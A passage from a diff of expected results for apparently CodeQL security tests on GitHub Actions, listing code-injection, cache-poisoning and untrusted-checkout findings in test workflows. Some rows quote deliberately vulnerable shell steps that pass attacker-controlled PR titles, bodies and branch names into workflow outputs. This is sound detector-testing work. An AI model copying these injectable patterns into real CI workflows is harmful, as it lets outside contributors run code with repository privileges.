workflow_run | +| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | ${{ steps.get-pr.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | ${{ fromJson(steps.get-pr-details.outputs.data).head.ref }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | ${{ fromJson(steps.get-pull-request.outputs.data).title }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test18.yml:2:3:2:19 | workflow_dispatch | workflow_dispatch | +| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | .github/workflows/test.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/untrusted_checkout1.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches3.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches5.yml:4:3:4:14 | workflow_run | workflow_run | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected index 5c5c26edb4e5..9cfac091f675 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaCodeInjection.expected @@ -7,4 +7,4 @@ nodes | .github/workflows/neg_code_injection1.yml:11:17:11:48 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select -| .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | Unprivileged code injection in $@, which may lead to cache poisoning. | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | Unprivileged code injection in $@, which may lead to cache poisoning ($@). | .github/workflows/code_injection1.yml:11:17:11:48 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/code_injection1.yml:2:3:2:15 | issue_comment | issue_comment | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected index cc5ce9bdf874..6b1a3e873134 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected @@ -44,10 +44,10 @@ edges | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | #select -| .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | .github/workflows/poisonable_step2.yml:15:9:20:6 | Uses Step | .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | .github/workflows/poisonable_step3.yml:13:7:19:4 | Uses Step | .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | .github/workflows/poisonable_step2.yml:15:9:20:6 | Uses Step | .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step2.yml:5:3:5:21 | pull_request_target | pull_request_target | +| .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | .github/workflows/poisonable_step3.yml:13:7:19:4 | Uses Step | .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step4.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step5.yml:3:3:3:21 | pull_request_target | pull_request_target | diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected index 418aeeea059e..da66ff822a39 100644 --- a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected +++ b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected @@ -97,13 +97,13 @@ edges | .github/workflows/test6.yml:224:7:232:4 | Uses Step | .github/workflows/test6.yml:232:7:252:4 | Uses Step | | .github/workflows/test6.yml:232:7:252:4 | Uses Step | .github/workflows/test6.yml:252:7:253:45 | Run Step | #select -| .github/workflows/comment.yml:58:9:60:2 | Run Step | .github/workflows/comment.yml:54:9:58:6 | Uses Step | .github/workflows/comment.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | -| .github/workflows/comment.yml:68:9:68:43 | Run Step | .github/workflows/comment.yml:64:9:68:6 | Uses Step | .github/workflows/comment.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | -| .github/workflows/test0.yml:58:9:60:2 | Run Step | .github/workflows/test0.yml:54:9:58:6 | Uses Step | .github/workflows/test0.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | -| .github/workflows/test0.yml:68:9:68:43 | Run Step | .github/workflows/test0.yml:64:9:68:6 | Uses Step | .github/workflows/test0.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | -| .github/workflows/test4.yml:85:7:88:54 | Uses Step | .github/workflows/test4.yml:79:7:85:4 | Uses Step | .github/workflows/test4.yml:85:7:88:54 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow. | -| .github/workflows/test5.yml:151:7:156:4 | Uses Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:151:7:156:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow. | -| .github/workflows/test5.yml:156:7:169:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:156:7:169:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | -| .github/workflows/test5.yml:169:7:180:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:169:7:180:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | -| .github/workflows/test6.yml:213:7:218:4 | Uses Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:213:7:218:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow. | -| .github/workflows/test6.yml:218:7:224:4 | Run Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:218:7:224:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | +| .github/workflows/comment.yml:58:9:60:2 | Run Step | .github/workflows/comment.yml:54:9:58:6 | Uses Step | .github/workflows/comment.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/comment.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/comment.yml:68:9:68:43 | Run Step | .github/workflows/comment.yml:64:9:68:6 | Uses Step | .github/workflows/comment.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/comment.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test0.yml:58:9:60:2 | Run Step | .github/workflows/test0.yml:54:9:58:6 | Uses Step | .github/workflows/test0.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test0.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test0.yml:68:9:68:43 | Run Step | .github/workflows/test0.yml:64:9:68:6 | Uses Step | .github/workflows/test0.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test0.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:85:7:88:54 | Uses Step | .github/workflows/test4.yml:79:7:85:4 | Uses Step | .github/workflows/test4.yml:85:7:88:54 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test4.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test5.yml:151:7:156:4 | Uses Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:151:7:156:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test5.yml:156:7:169:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | 